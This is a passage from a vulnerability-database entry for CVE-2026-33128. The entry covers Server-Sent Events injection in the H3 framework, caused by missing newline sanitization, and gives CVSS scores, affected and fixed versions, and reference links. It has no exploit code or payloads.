"value": "H3 is a minimal H(TTP) framework. In versions prior to 1.15.6 and between 2.0.0 through 2.0.1-rc.14, createEventStream is vulnerable to Server-Sent Events (SSE) injection due to missing newline sanitization in formatEventStreamMessage() and formatEventStreamComment(). An attacker who controls any part of an SSE message field (id, event, data, or comment) can inject arbitrary SSE events to connected clients. This issue is fixed in versions 1.15.6 and 2.0.1-rc.15."
},
{
"lang": "es",
"value": "H3 es un framework H(TTP) m\u00ednimo. En versiones anteriores a la 1.15.6 y entre la 2.0.0 y la 2.0.1-rc.14, createEventStream es vulnerable a la inyecci\u00f3n de Eventos Enviados por el Servidor (SSE) debido a la falta de saneamiento de nueva l\u00ednea en formatEventStreamMessage() y formatEventStreamComment(). Un atacante que controla cualquier parte de un campo de mensaje SSE (id, evento, datos o comentario) puede inyectar eventos SSE arbitrarios a los clientes conectados. Este problema est\u00e1 solucionado en las versiones 1.15.6 y 2.0.1-rc.15."
}
],
"id": "CVE-2026-33128",
"lastModified": "2026-03-20T20:00:21.330",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 4.7,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-03-20T10:16:19.160",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Product"
],
"url": "https://github.com/h3js/h3/blob/52c82e18bb643d124b8b9ec3b1f62b081f044611/src/utils/internal/event-stream.ts#L170-L187"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/h3js/h3/commit/7791538e15ca22437307c06b78fa155bb73632a6"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/h3js/h3/security/advisories/GHSA-22cc-p3c6-wpvm"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-93"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…